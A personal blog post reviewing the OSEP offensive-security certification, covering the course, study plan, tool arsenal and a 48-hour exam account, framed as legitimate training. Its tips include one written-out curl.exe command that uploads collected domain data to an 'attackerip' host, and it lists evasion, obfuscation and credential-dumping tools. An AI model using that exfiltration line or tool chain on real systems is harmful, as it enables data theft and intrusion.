my experience passing the osep cert

I recently passed the OSEP exam on the first attempt, achieving both independent requirements to pass: >=100 points and the slippery secret.txt flag. 💅

I wanted to solidify my internal pentesting skillz, since web hacking is more my comfort zone (check my OSWE cert review). So this was a great opportunity to push myself and learn in a challenging environment.

Here I’ll share my personal experience preparing for this exam.

spoiler

There will be no spoilers here. It’s just my personal experience, without anything that isn’t already public.

os-what?

The Offensive Security Experienced Pentester (OSEP) from OffSec is probably the most advanced active directory penetration testing cert, along with the Certified Active Directory Pentesting Expert (CAPE) from HackTheBox¹.

PEN-300: Advanced Penetration Testing (PEN-300) is the course behind the OSEP certification, and it covers a wide range of internal penetration testing skills and techniques, including:

• develop client-side attack techniques using Microsoft Office and other common applications, including building a reliable attack vector
• master antivirus evasion methods and tools
• bypass application whitelisting mechanisms like AppLocker
• implement advanced lateral movement strategies in Windows and Linux environments
• conduct sophisticated Active Directory exploitation and attacks to uncover hidden vulnerabilities
• evade network detection systems, including IDS and IPS
• perform advanced exploitation of Microsoft SQL and Active Directory
• use advanced programming concepts and Win32 APIs for attack development

the course

Overall, the course is pretty well put together. The content is easy to follow and goes in-depth on relevant topics. Some sections aren’t strictly required for the exam, but it’s super helpful to know what’s under the hood.

Fun fact: I managed to escalate a sqli to an rce in a real engagement thanks to studying this cert. So just for that, I guess it was worth it, kek.

stuff I liked

• the network section was accurate and aligned with what I’ve seen in real enterprise setups.
• the demo of why and how the default meterpreter obfuscation gets flagged is 🔥.
• the challenges’ attack paths cover the course material quite organically.
• the adcs section has now been included!
• phishing via ics calendar invites was very interesting and up to date.
• pwning ci/cd pipelines open a ton of possibilities for latmov. Learned a lot here!

stuff I didn’t *love*

• post-exploitation is sometimes too permissive: once you’re local admin, you can do basically anything, like disabling defender and/or firewall rules.
• few opsec refs/considerations, e.g. psexec usage, net user, etc.
• some av bypasses are too naïve, e.g. vanilla process hollowing would get caught by Crowdstrike or any other competent EDR. That said, EDR evasion is a demanding field that requires constant updates, and this course does provide a solid baseline.
• phishing is mostly vba macros and hta: both are a bit outdated (macros are disabled by default now) and easy to detect.

reqs

IMHO, the following skills matter:

• ad hacking: being familiar with the core concepts and common offensive techniques.
• programming background: being fluent with c# and powershell.
• ctf experience: if you don’t have some background pwning boxes, you will struggle.
• windows internals: nothing crazy, but knowing winapi, process and filesystem structure, etc. helps.

prep

I prepped for 1.5 months, and this was my strategy:

1. reviewed external content listed in references.
2. watched a selection of the course videos at 2x speed. Just the most challenging topics.
3. actively read the book: highlighting important stuff and taking notes on useful commands.
4. pwned the first 5 challenges. Thoroughly. Investigating all possible attack paths, e.g. dropper vs loader.
5. re-reviewed my challenge solutions and forced myself to understand *all* the concepts behind the techniques: if you fall down a rabbit hole and treat everything as a black box, you’re asking for trouble.

r4nd0m tips

• you can compile with mono to avoid visual studio. I basically managed to compile everything in kali and didn’t touch the windows lab machine²!
• change the name of the artifacts because they don’t necessarily overwrite!³
• updog is god. You can host files but also exfil like: curl.exe http://attackerip/upload -F "file=@C:\Windows\tasks\20260415044445_BloodHound.zip" -F "path=./".
• migrate your revshell processes for stability.
• get comfortable with network pivoting.
• become best friends with your c2 of choice. I personally reviewed the metasploit unleashed guide⁴.
• read the exam guide and the exam objectives. For instance, ai chatbots, paid tools and automated exploitation are not allowed.
• IMHO, the challenges prepare you enough to face the exam. Although I’ve heard HTB RastaLabs and Offshore are good prep too.
• have a plan z: there are too many variables involved, so if something fails, you need to know different alternatives.
• take good notes before and *during* the exam. The environment is huge and you can get lost/overwhelmed easily.

resources

I came across a ton of resources, but here’s a curated list of the most practical ones.

OSEP-specific resources sorted by subjective usefulness:

• https://www.emmanuelsolis.com/osep.html
• https://github.com/OoStellarnightoO/OSEP_Notes
• https://0x4rt3mis.github.io/posts/OSEP-Cheat-Sheet/
• https://github.com/darkness215/osep-tools/
• https://github.com/beauknowstech/OSEP-Everything

warning

Be aware that some of these commands and scripts are now flagged, since the osep environment gets updated over time, so don’t be cocky and test everything before trying your luck on the exam.

Related off-topic resources:

• ippsec writeups
• goad pwning series by mayfly277
• tcm ad section of the PEH course⁵.
• orange cyberdefense ad cheatsheet

Not strictly required, but the book “Evading EDR” from No Starch Press is 🔥:

my gig

Here was my arsenal of tools⁶:

• external recon: autorecon
• c2: keep calm and use meterpreter (with custom c# loaders aligned with the book’s content)
• clm: bypass-clm
• obfuscation: InvisibilityCloak and Invoke-Obfuscation
• vba macros: BadAssMacros
• file sharing: updog. It has file upload functionality too!
• ad enum: powerview and adpeas
• hta: Dotnet2JScript loading the js as an external file
• privesc enum: peas-ng suite and powerup. But honestly, I ended up doing everything manually.
• revshell: penelope
• compiler: mono, downloading missing dll dependencies from nuget.org

And my kali setup:

• virtualization: kali on qemu on debian
• reporting: sysreptor.
• note taking: obsidian
• terminal: terminator
• rdp client: remmina
• browser extension: Bye Bye, Google AI: Turn off Google AI Overviews, Discussions and Ads

exam

As you may already know, OffSec advanced exams give you 48h for the technical part and 24h to write the report. I knew it was going to be intense.

I grabbed a monster⁷ and started it at 0100 AM. I promised myself I wouldn’t go to sleep until I got comfortable with the progress.

After 5 hours I had 30 points. I was feeling confident about the next steps, so I took a nap.

I woke up at 0930 AM. Then I made a lot of progress. Not everything is linear, and effort doesn’t always translate into flags. People always stress that if you’re stuck, don’t force it: take a walk. But I think the opposite is also true: if you’re on a roll, don’t stop digging. 🪏

Then I hit a wall after the 6th flag, so I took a walk to lower my cortisol levels. My plan: keep tryharding until day two, and if I still had no luck by then, switch to the second path and grab more flags there.

It was quite frustrating since I had a clear idea of what I wanted to do, but somehow it didn’t work. Finally, I caught it: I had missed a little syntax detail. 🤦‍♂️

So after ~23h I went to sleep with 9 flags in my pocket: I just needed one more. On day two, I woke up at 0800 AM. Then I pulled secret.txt at 1000 AM, which meant I met both independent criteria to pass: >=100 points and the secret.txt.

Finally, I crafted the report with sysreptor and sent it for review that same evening.

timeline

I asked Claude to create this fun timeline of my exam progress:

wh00t wh00t

Two days after the exam I received the beloved email from OffSec. I passed! Yay!

Was it worth the sweat? Absolutely. Most of the content actually transfers to real engagements, which is what I really cared about.

Already deep into OSED prep. Will share that story here too whenever I make it through. Wish me luck! 🤞

1. well, generalizing here: there are others like CRTO, CRTE, CRTL, etc. There’s no 1-to-1 comparison since each one focuses on a different angle: av/edr evasion, c2, etc. ↩

2. somehow slow AF. ↩

3. wasted hours because of this, kek. ↩

4. I used msf because I was more familiar with it and it aligns with the course content. That said, other options like Sliver also have success stories worth checking out. ↩

5. I had already purchased it when doing the PNPT cert a while ago. ↩

6. note that I’ve omitted the most obvious ones like mimikatz or secretsdump. Duh. ↩

7. not sponsored. ↩